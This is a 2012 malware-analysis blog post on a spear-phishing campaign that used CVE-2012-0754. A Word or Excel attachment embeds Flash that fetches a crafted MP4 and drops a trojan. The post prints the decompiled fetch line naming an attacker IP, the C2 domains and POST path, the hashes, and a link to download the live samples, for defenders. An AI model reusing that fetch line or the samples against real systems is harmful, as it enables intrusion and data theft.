Clicky

Pages

Monday, March 5, 2012

Mar 2 CVE-2012-0754 SWF in DOC Iran's Oil and Nuclear Situation.doc

Update: March 9, 2012 - I added another sample donated by anonymous  - it is the same exploit but embedded in an Excel spreadsheet. The details about this sample are highlighted in yellow below.



This is a message from a targeted attack and quite possibly you already received a few on your own - there seem to be a new campaign underway using this new CVE-2012-0754 exploit. The vulnerability exists in Flash and is exploited when it tries to parse a crafted MP4 file. Successful exploitation allows an attacker to execute an arbitrary code.
In this case, the attachment comes as a Word document "Iran's Oil and Nuclear Situation.doc" (and it can come as any document), which contains flash instructing it to download and parse a malformed MP4. The dropped binary is a rather common trojan characterized by its traffic. When it comes to AV names, I don't know whether Graftor or Yayih.A are meaningful or some generic names but maybe you have your own name for it.  

(CVE)number

Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. 

File information


File: Iran's Oil and Nuclear Situation.doc
Size: 106604
MD5:  E92A4FC283EB2802AD6D0E24C7FCC857
%Temp%\us.exe
File: us.exe
Size: 4861440
MD5:  FD1BE09E499E8E380424B3835FC973A8
https://www.virustotal.com/file/68360603794c0f6d1aff9f6853dbdbb1860a89269d3147dab768034d4195ca62/analysis/1330800179/

Update: March 9, 2012
File: CVE-2012-0744-xls.xls
Size: 241236
MD5:  198DE4A1EBF05F7F44FAF76F167B0233

Payload
File: renos.exe
Size: 61440
MD5:  AD7F04E73E19DEBF7C38034E3DAAF535


Flash
File: CVE-2012-0744-xls.swf
Size: 2436
MD5:  143E2FD4D39199ABF7B871A2BB96FF1F

Mp4
not available but it was 
http://61.196.209.58/syoukai.mp4

Download



With many thanks to anonymous
CVE-2012-0754
│   capturebatlog.txt
│   pcap.pcap
│   regshotlog.txt
│   swfLogfile.PML

├───binary dropped
│       us-embedded.exe
│       us.exe

├───flash
│   │   CVE-2012-0754.swf
│   │   File3~.swf.dump.txt - swf info
│   │
│   └───Scripts
│       └───ActionScript 3.0
│               XmlSwf.as

├───mp4
│       test.mp4

└───original
        Iran's Oil and Nuclear Situation.doc


├───Original
│       CVE-2012-0744-xls.xls

└───Payload
    │   CVE-2012-0744-xls.swf
    │   renos.exe
    │
    └───CVE-2012-0744-xls Scripts
        └───ActionScript 3.0
                XmlSwf.as











Message details

I do not have a full message, but here is the sender

From: william abnett <wmorrison89@gmail.com>
Date: March 2, 2012 7:42:24 EST
To: william.abnett <william.abnett@gmail.com>
Subject: Iran's Oil and Nuclear Situation



Exploit and Original File description

Created file
The word document contains flash, which downloads a corrupted mp4 file. The mp4 file itself is not anything special but an 0C filled (22kb) mp4 file with a valid mp4 header. See below comparison of a valid file and the crafted one. This mp4 file causes memory corruption and code execution. Read more about how that works here Microsoft Research Technical Report MSR-TR-2008-176 Nozzle: A Defense Against Heap-spraying Code Injection Attacks

In result, it allows it drop and execute the embedded binary - it is created in the user %Temp% directory as us.exe - see more about it below.


Original files screenshots

image donated by anonymous
I wasn't able to see the cute bear flash file in MS Word but  can see it well when opened it using Google Docs.

Flash file and MP4 file analysis

Existing methods of extracting SWF files from malicious PDF and Office documents

PDF tools:
There are many ways to carve SWF files out of pdf files because it is a common carrier for them - for example, see the well known PDF stream dumper described here by  Lenny Zeltser, pySwfCarve.py by Giuseppe Bonfa, or SWF Mastah by Brandon Dixon

Office Tools:
There is this method of extracting SWF files from office documents - I haven't tried it but looks sort of easy: How To Extract SWF Flash From Excel or Word - code by Emily and explained by Walker. Maybe there are others too.

Update March 11, 2012 - Yuki posted his python script for extracting flash from Office docs (Google translate from Chinese)


CWS - compressed Flash files.
Most of flash embedded in documents is compressed and can be seen in the hex view of the files as starting with CWS. CWS compressed files use the same comression method as any ZiP files -so called Lempel-Ziv-Welch (or LZW) compression. Which means that all you need to get the compressed flash files out the documents and decompress them is an [un]archiver like 7zip or similar. I haven't seen it described online so I shall name it 'the lazy mila' method, but I don't know,  maybe it is a wheel invented by many before me. You can carve swf or other embedded files manually and it is easy to find the start of the file but requires a steady hand and good eye to find the end. It sometimes takes several attempts too and can be tricky. The lazy method seems easier.


CWS Extraction  from any Office Documents and PDFs (The lazy way):
You need:
7zip   http://www.7-zip.org/
Winhex or Flexhex (or other hex editor. File Insight is nice but won't work )

Steps:
1.  Open the document in a hex editor and highlight all data starting from and including CWS to the end of the file and paste it into a new file. Save it as any file name without an extension.
2. Right click on the file and select 7Zip - Extract files.

You are done. 7zip will peel off all the extra unrelated data and create a folder with your swf file inside - it will even create the correct extension. It seems to work only on Windows - it does not work on Linux well and I did not test on Mac but I am sure you have a Windows VM or two.

You can now use any Flash decompiler such as Trillix, Sothink decompiler, or AS3 Socerer to decompile it and get the action script you are after.

Update March 11, 2012  - you can also use the SWF Investigator by Adobe to decompile it - Reviewed here by Brandon Dixon http://blog.9bplus.com/adobes-swf-tools-cve-2012-0754 and here by Yuki

 
FWS - uncompressed flash files.

Occasionally, malicious documents include FWS - decompressed files.  Flash decompilers will happily parse any file with FWS header even if it has an enormous padding or extra data in the end. So, if you want an easy way to extract those files, you cannot use 7zip but you can select all data starting with and including FWS and copy into a new file - give it swf extension when you save.
You can now decompile it even if it is not exactly the correct embedded flash file. You can save the action script and if you have a full paid (not just trial) version of those decompilers, you can probably even re-save it as the small real flash file.

Flash file

File: CVE-2012-0754.swf
Size: 2431
MD5:  128A66CC3EFE6F424C3FEDCC4B6235AC
See below decompiled flash from our file  - it instructs to download the mp4 file this.MyNS.play("http://208.115.230.76/test.mp4");

208.115.230.76
76-230-115-208.static.reverse.lstn.net
Host reachable, 77 ms. average, 2 of 4 pings lost
208.115.192.0 - 208.115.255.255
Limestone Networks, Inc.
400 S. Akard Street
Suite 200
Dallas
TX
75202
United States
Action Script



Address  Hex length Dec length Data
00000000      97f.0     2431.0 SWF
00000000       14.0       20.0  Header
00000000        3.0        3.0   File label = "FWS"
00000003        1.0        1.0   File version = 9
00000004        4.0        4.0   File length = 2431
00000008        8.0        8.0   Frame rect
00000010        2.0        2.0   Frame rate = 25.000000
00000012        2.0        2.0   Frame count = 1
00000014      96b.0     2411.0  Tags
00000014        6.0        6.0   FileAttribute = 69
0000001a      954.0     2388.0   DoABCDefine = 82
0000096e        d.0       13.0   SymbolClass = 76
0000097b        2.0        2.0   ShowFrame = 1
0000097d        2.0        2.0   End = 0

Update: March 9, 2012- ActionScript for Excel embedded SWF


MP4 file
GET /test.mp4 HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,1,102,55
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 208.115.230.76
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 03 Mar 2012 18:01:01 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.8
Last-Modified: Thu, 23 Feb 2012 01:27:38 GMT
ETag: "120000000071c4-5770-4b9978caa1680"
Accept-Ranges: bytes
Content-Length: 22384
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: video/mp4

....ftypmp42....mp42isom...
cprt..................................

As was mentioned above, there is nothing unique in the MP4 file and you are likely to see the same or nearly identical mp4 in all of attacks using this exploit.
File: test.mp4
Size: 22384
MD5:  8933598C8B1FA5E493497B11C48DA4F2
See below on the picture the normal mp4 file that I recorded compared to the crafted file in hex editor.  If you need, you can download the normal file here (normal.mp4 16KB)



















Payload and traffic

Resource section view:
Java updater information and
and the language ID of the resource
- Chinese Language
File: us-embedded.exe
Size: 23040
MD5:  CB3DCDE34FD9FF0E19381D99B02F9692

File: us.exe
Size: 4861440
MD5:  FD1BE09E499E8E380424B3835FC973A8

The file (us.exe MD5: FD1BE09E499E8E380424B3835FC973A8 4861440 bytes) is created in the logged in user %Temp% directory. The size of the embedded file is 22.5 KB (23040 bytes) and the size of the created us.exe is 4.63MB. It is an odd discrepancy until you look at the file and it looks like the code is repeated over and over - 211 times. The file resource section indicates the file is meant to look like a java updater, which is always larger than 22.5KB and that would explain all this padding, which is done at the time when the file is being written to the disk.

The file strings are below - you can see the command and control servers and the POST request url. If you are tracking APT, you are likely to recognize this trojan.
Strings
 
Name listing

Traffic and C&C 

C&Cs and the post request this this type of trojan makes are encoded in the binary.  I didn't capture a good pcap for the binary but you can see the netflow on the process monitor output posted below. The download package includes the PML log.


www.documents.myPicture.info
199.192.156.134
documents.myPicture.info
199.192.156.134
ftp.documents.myPicture.info
68.85.151.214

POST /bbs/info.asp








Process monitor network log


mypicture.info
204.16.173.30
vanity.changeip.com
ChangeIP.com
ChangeIP.com
c/o Dynamic DNS Provider


199.192.156.134
Host reachable, 89 ms. average
199.192.152.0 - 199.192.159.255
VPS21 LTD
38958 S FREMONT BLVD
FREMONT
CA
94536
United States
zou, jinhe
+1-408-205-7550
zoujinhe@ehostingusa.com  -- a lot of Chinese language sites on that VPS

68.85.151.214
te-3-0-0-ten07.eugene.or.bverton.comcast.net
Host reachable, 100 ms. average
68.80.0.0 - 68.87.255.255
Comcast Cable Communications, Inc.
1800 Bishops Gate Blvd
Mt Laurel
NJ
08054
United States  -  Comcast cable modem in Beaverton, OR  in an area of restaurants and businesses in the western urban area of Beaverton  ,  thanks to the anonymous for the tips


Update: March 9, 2012
kiki.edns.biz - subdomain is currently down
edns.biz
vanity.changeip.com
Sam Norris
ChangeIP.com
P.O. Box 2333
San Marcos
California

it was 12.4.228.10
12.4.228.10Host reachable, 33 ms. average
12.4.228.0 - 12.4.228.127
STAR TECH INC
1490 N HERMITAGE RD
HERMITAGE
PA
16148
United States



Automatic scans




Vicheck scan


Virustotal
SHA256:     2dd92dcfe5a46143b9a879122432e48ef0b9016736b66cd322f5c9fb5d3441dd
SHA1:     988541c505fef37a48eca2cad926ec378a09a526
MD5:     e92a4fc283eb2802ad6d0e24c7fcc857
File size:     104.1 KB ( 106604 bytes )
File name:     Iran's Oil and Nuclear Situation.doc
File type:     MS Word Document
Detection ratio:     7 / 43
Analysis date:     2012-03-05 13:16:51 UTC ( 0 minutes ago )
Avast     SWF:Dropper [Heur]     20120305
Emsisoft     Exploit.D-Encrypted!IK     20120305
nProtect     Exploit.D-Encrypted.Gen     20120305


Virustotal
HA256:     68360603794c0f6d1aff9f6853dbdbb1860a89269d3147dab768034d4195ca62
SHA1:     8b79abcb79a8ab962d386dfc3e51ac5de9428d4f
MD5:     fd1be09e499e8e380424b3835fc973a8
File size:     4.6 MB ( 4861440 bytes )
File name:     us.exe

File type:     Win32 EXE
Detection ratio:     7 / 42
Analysis date:     2012-03-03 18:42:59 UTC ( 1 day, 18 hours ago )
BitDefender     Gen:Variant.Graftor.15447     20120303
F-Secure     Gen:Variant.Graftor.15447     20120303
GData     Gen:Variant.Graftor.15447     20120303
Kaspersky     Trojan.Win32.AntiAV.ptv     20120303
Microsoft     Trojan:Win32/Yayih.A     20120303
NOD32     a variant of Win32/Agent.OJL     20120303


Virustotal
SHA256:     e7ed13395dc2cc89cd7814c84c14b175c57c8fc0e6864ec304901af054b5199c
SHA1:     cd3ce4c08704ba447b39fc562215f41c007187f5
MD5:     cb3dcde34fd9ff0e19381d99b02f9692
File size:     22.5 KB ( 23040 bytes )
File name:     us-embedded.exe

File type:     Win32 EXE
Detection ratio:     9 / 43
Analysis date:     2012-03-05 13:18:10 UTC ( 0 minutes ago )
Avast     Win32:Malware-gen     20120305
AVG     Generic27.AFPX     20120305
DrWeb     Trojan.MulDrop3.38640     20120305
F-Secure     Gen:Variant.Graftor.15447     20120305
GData     Gen:Variant.Graftor.15447     20120305
Kaspersky     Trojan.Win32.AntiAV.ptv     20120305
Microsoft     Trojan:Win32/Yayih.A     20120305
NOD32     a variant of Win32/Agent.OJL     20120305

Virustotal
SHA256:     ab8bc59730a9c709214fb1a14c88dc64c979480d0fa34e19e99be644e4e9ee40
SHA1:     74c1e426a7ab9cf77a57b919a0c0fc563c15b441
MD5:     128a66cc3efe6f424c3fedcc4b6235ac
File size:     2.4 KB ( 2431 bytes )
File name:     File3~.swf

File type:     Flash
Detection ratio:     2 / 43
Analysis date:     2012-03-03 19:26:57 UTC ( 1 day, 17 hours ago )
Avast     SWF:Dropper [Heur]     20120303
GData     SWF:Dropper     20120303

VIrustotal
SHA256:     bb6d781d1bd4da0914670a83b419b605661bbfac86bf9ae153f81fe94bbb6425
SHA1:     8db153c242ea8b4ce8b12a80f875f50ec92ecf97
MD5:     8933598c8b1fa5e493497b11c48da4f2
File size:     21.9 KB ( 22384 bytes )
File name:     test.mp4
File type:     MP4
Detection ratio:     6 / 43
Analysis date:     2012-03-03 16:29:25 UTC ( 1 day, 20 hours ago )
BitDefender     Exploit.CVE-2012-0754.Gen     20120303
Emsisoft     Exploit.MS04.CVE-2004-0210-2012-0754!IK     20120303
F-Secure     Exploit.CVE-2012-0754.Gen     20120303
GData     Exploit.CVE-2012-0754.Gen     20120303
Ikarus     Exploit.MS04.CVE-2004-0210-2012-0754     20120303
nProtect     Exploit.CVE-2012-0754.Gen     20120303

Excel file and payload scans
SHA256:     c34ad3cac4d3b8420fa8dbe1bb0760623ecfa27a6ab7790c231e9e3a92b9039c
SHA1:     4e03e469d9040307bcdd1461f4f242d73ff40d4c
MD5:     198de4a1ebf05f7f44faf76f167b0233
File size:     235.6 KB ( 241236 bytes )
File name:     CVE-2012-0744-xls.xls
File type:     MS Excel Spreadsheet
Detection ratio:     16 / 43
Analysis date:     2012-03-09 17:13:48 UTC ( 0 minutes ago )
AhnLab-V3     Dropper/Cve-2012-0754     20120308
Avast     SWF:Dropper [Heur]     20120309
BitDefender     Script.SWF.Cxx     20120309
ClamAV     Exploit.xls-1     20120309
Comodo     UnclassifiedMalware     20120309
Emsisoft     Exploit.D-Encrypted!IK     20120309
F-Secure     Script.SWF.Cxx     20120309
GData     Script.SWF.Cxx     20120309
Ikarus     Exploit.D-Encrypted     20120309
Microsoft     Exploit:SWF/CVE-2012-0754.A     20120309
NOD32     SWF/Exploit.CVE-2012-0754.B     20120309
nProtect     Exploit/W32.CVE-2012-0754.241236     20120309
Symantec     Trojan.Mdropper     20120309
TrendMicro     TROJ_MDROP.AW     20120309
TrendMicro-HouseCall     TROJ_MDROP.AW     20120309
ViRobot     Exploit.S.CVE-2012-0754.241236     20120309

Virustotal
SHA256:     b3a97be4160fb261e138888df276f9076ed76fe2efca3c71b3ebf7aa8713f4a4
SHA1:     12e36f86ce54576cc38b2edfd13e3a5aa6c8d51c
MD5:     ad7f04e73e19debf7c38034e3daaf535
File size:     60.0 KB ( 61440 bytes )
File name:     ad7f04e73e19debf7c38034e3daaf535
File type:     Win32 EXE
Detection ratio:     12 / 43
Analysis date:     2012-03-07 15:23:09 UTC ( 2 days, 1 hour ago )
AhnLab-V3     Win-Trojan/Renos.61440.E     20120307
AntiVir     TR/Renos.AX     20120307
Avast     Win32:Malware-gen     20120307
BitDefender     Trojan.Generic.KDV.554937     20120307
Commtouch     -     20120307
Emsisoft     Trojan.Renos!IK     20120307
F-Secure     Trojan.Generic.KDV.554937     20120307
GData     Trojan.Generic.KDV.554937     20120307
Ikarus     Trojan.Renos     20120307
McAfee     Generic.grp!gz     20120307
McAfee-GW-Edition     Artemis!AD7F04E73E19     20120307
NOD32     a variant of Win32/Demtranc.AA     20120307
VIPRE     Trojan.Win32.Generic.pak!cobra     20120307



SHA256:     d018ea9fea664b9608474e1271aaf23fe5d3b6161a2db486592e763475e377bd
SHA1:     a2eb4ee6e2d4f2e51dca1d238e017d6420156bfe
MD5:     143e2fd4d39199abf7b871a2bb96ff1f
File size:     2.4 KB ( 2436 bytes )
File name:     CVE-2012-0744-xls.swf
File type:     Flash
Detection ratio:     8 / 43
Analysis date:     2012-03-09 17:14:45 UTC ( 0 minutes ago )
Avast     SWF:Dropper [Heur]     20120309
BitDefender     Script.SWF.Cxx     20120309
F-Secure     Script.SWF.Cxx     20120309
GData     Script.SWF.Cxx     20120309
Microsoft     Exploit:SWF/CVE-2012-0754.A     20120309
NOD32     SWF/Exploit.CVE-2012-0754.B     20120309
nProtect     Script.SWF.Cxx     20120309
Symantec     Trojan.Mdropper     20120309

3 comments:

  1. Great analysis Mila. Thanks for sharing the samples. I have written snort detection rules for the above exploit attempt.

    http://blog.chackraview.net/2012/03/06/snort-detections-for-targeted-attack-using-cve-2012-0754-exploit/

    ReplyDelete
  2. That's great! tks Mila

    ReplyDelete